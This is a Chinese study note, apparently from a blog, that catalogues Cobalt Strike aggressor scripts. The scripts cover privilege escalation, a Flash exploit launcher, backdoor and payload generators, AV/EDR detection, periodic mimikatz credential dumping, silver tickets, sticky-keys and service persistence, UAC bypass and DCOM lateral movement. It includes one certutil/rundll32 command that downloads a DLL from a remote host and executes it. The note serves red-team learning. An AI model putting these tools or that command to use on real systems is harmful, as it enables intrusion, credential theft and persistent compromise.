郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。
下载地址:ars3n11/Aggressor-Scripts: Cobalt Strike aggressor scripts (github.com)
功能:ps命令展示进程树并上色,作者实际上是修改自 harleyQu1nn 的 ProcessColor.cna,现在两者功能已经完全一致了。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pVcMrFvK-1643118933736)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115214728115.png)]
下载地址:rsmudge/ElevateKit: The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike’s Beacon payload. (github.com)
功能:CS作者rsmudge大佬官方出品,增加几种提权方式。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VObsunYs-1643118933737)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115221322026.png)]
下载地址:vysecurity/CVE-2018-4878: Aggressor Script to launch IE driveby for CVE-2018-4878 (github.com)
功能:VincentYiu写的一键起CVE-2018-4878(Flash漏洞)服务脚本
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kWSsmv8N-1643118933738)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115221849618.png)]
功能:ping.cna 注册一个ping命令,并转换IP地址为HEX的形式去执行该命令。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-scMusCjJ-1643118933738)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117103703753.png)]
功能:AVQuery.cna 检查杀毒是通过检查注册表键值来判断,同样的可以自行添加自己需要的条目。
AV_Query
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gB5xhUVe-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115222516289.png)]
功能:ArtifactPayloadGenerator.cna 生成多种类型的后门文件,生成的结果位于cs目录下的 opt\cobaltstrike
目录下。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-S0RCbglK-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115223543134.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6VYKCPCD-1643118933739)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115224705490.png)]
功能:类似使用CertUtil下载文件
命令执行:
powerpick certutil.exe -urlcache -split -f http://192.168.0.2:280/dll.txt Adobedll.dll; rundll32.exe Adobedll.dll,StartW
powerpick:不使用 powershell.exe 执行 powershell 命令。这个命令依赖于由 Lee Christensen 开发的非托管 PowerShell 技术。powershell 和 powerpick 命令会使用当前令牌( token )。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v7UBu6uW-1643118933740)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115232659018.png)]
CertUtil下载文件参考:certutil在传输payload中的新奇技巧 - admin-神风 - 博客园 (cnblogs.com)
功能:EDR.cna使用检测驱动的方式来检测是否存在终端安全产品。相对于主流杀毒软件,EDR 终端安全产品主要用来反APT类的持久化攻击,所以较之常规杀毒更为难缠。
# edr_query [hostname] [arch]
edr_query localhost x64
# localhost 表示为本地主机
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q3Y4fvbx-1643118933740)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115233447511.png)]
功能:logvis.cna 实现了beacon command log的可视化。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UVzeGRZr-1643118933741)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115233706638.png)]
功能:ProcessMonitor.cna 可以实现指定时间段内对于程序运行情况的监控。
ProcessMonitor Start 1m
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0ZjqPMgj-1643118933741)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115235524635.png)]
功能:RedTeamRepo.cna 当中包含了不少tips,可以使用RedRepo命令查看。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8gkPmkdv-1643118933742)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115234929960.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iZmcM1wf-1643118933742)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115235005246.png)]
功能:SMBPayloadGenerator.cna 可以生成基于SMB类型 listener 的 payload,同样是输出到 opt\cobaltstrike
目录下,在目标主机上运行该 Payload 可获得 Beacon 会话。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-N8hlH0ro-1643118933742)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220115235908166.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ObteuRib-1643118933742)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220116000417812.png)]
功能:Logging目录下的 logger.cna 可以将log导出到HTML,log也位于 opt\cobaltstrike
目录中。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-shjLJT9w-1643118933743)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220116132048563.png)]
功能:beacon_to_empire.cna 可以一键把会话弹到empire,不过需要提前在cna脚本当中配置好empire的信息。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Mhd3lLgy-1643118933743)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117085003539.png)]
功能:beaconestablishednote.cna 用来给新上线的机器备注时间,虽然event log当中有,但是这里备注相对直观。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Trbfl7B9-1643118933749)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117084925634.png)]
功能:mimikatz-every-30m.cna 可以实现每30分钟抓一次密码,想修改时间的话可以直接在脚本当中修改。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6HVFUoiJ-1643118933750)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117085548672.png)]
功能:ping_aliases.cna 脚本增加了“qping”和“smbscan”两条命令。,
# qping只ping目标一下
qping [target]
# smbscan用来扫描SMB的445端口且支持ip段。
portscan [targets] none
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Y2yHIY3H-1643118933750)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117090533125.png)]
功能:powershell.cna 快速利用 PowerUp.ps1 和 powerview.ps1。使用前需要将 PowerUp.ps1 和 powerview.ps1 文件移动到 powershell.cna 脚本当前目录下
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QZQYL0Sa-1643118933751)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117091112886.png)]
功能:ps-window-alias.cna 为命令行中增加pspane命令一键打开processlist。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-kaTg1QwX-1643118933751)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117091933634.png)]
功能:silver-tickets.cna 可以一键制作一个白银票据。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PfXj1aKx-1643118933751)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117092301531.png)]
功能:sleeptimer.cna 则可以根据人类作息自动设置sleep间隔,默认时间是晚八点到早六点。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-JlHpHbJt-1643118933752)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117092546553.png)]
功能:Beaconpire目录下的beaconpire.cna 实现empire相关配置参数的可视化控制,以及与empire实现一定程度的联动。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2vjExY2Q-1643118933752)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117092844411.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lh0NLPbO-1643118933753)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117093516886.png)]
功能:bueller.cna通过端口扫描来检测哪个 Beacon 可以访问哪些特定的主机
1. 选择所有的 Beacon 会话
2. 右键选择 "Bueller? Anyone?"
3. 输入目标的主机与端口
4. 在 "Script Console" 查看结果
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-i9KzI6RJ-1643118933757)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117105641305.png)]
功能:cdolla.cna 检测当前上线机器当中哪些目标为本地管理员,并列出哪些用户在90天内登陆过。
1. 选择一个 Beacon 会话
2. 右键选择 "cdolla"
2. beacon 会话下:cdolla [-users]
3. 扫描一个目标:cdolla 10.10.10.10 [-users]
功能:portscan_results.cna 会在view下新加一栏"Port Scan Results",用来展示portscan的结果,并且支持排序。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-v7f8yTJq-1643118933757)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117110742825.png)]
功能:service-reboot.cna 会使用sc创建一个后门服务,重启有效。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CuemihK8-1643118933757)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117101529806.png)]
功能:sticky-keys.cna 会修改防火墙规则然后把粘滞键在注册表的记录修改为cmd,实现远程连接目标主机调出粘滞键后门。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4zOO4jaN-1643118933758)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117101627134.png)]
下载地址:ZonkSec/persistence-aggressor-script: initial commit (github.com)
功能:persistence.cna 简单来说就是通过注册表, 写服务, WMI, linkinfo, 粘滞键5种方式通过9种手法实现持久控制,在命令行中新注册了一个persistence命令。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-GmkHWTfz-1643118933758)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117104730002.png)]
功能:loader.cna 一键导入 elevate.cna 和 persistence.cna 脚本
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LxhbP131-1643118933758)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117111305891.png)]
功能:lateral 目录下的 dcom.cna 是使用DCOM运行PowerShell在远程主机上生成会话。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-X4MlvlGm-1643118933759)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117111527318.png)]
下载地址:RhinoSecurityLabs/Aggressor-Scripts: Aggregation of Cobalt Strike’s aggressor scripts. (github.com)
功能:增加 Bypass UAC 方式
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XlMF3U5x-1643118933759)(C:\Users\f_carey\AppData\Roaming\Typora\typora-user-images\image-20220117112537714.png)]
scripts/red-team/aggressor at master · gaudard/scripts (github.com)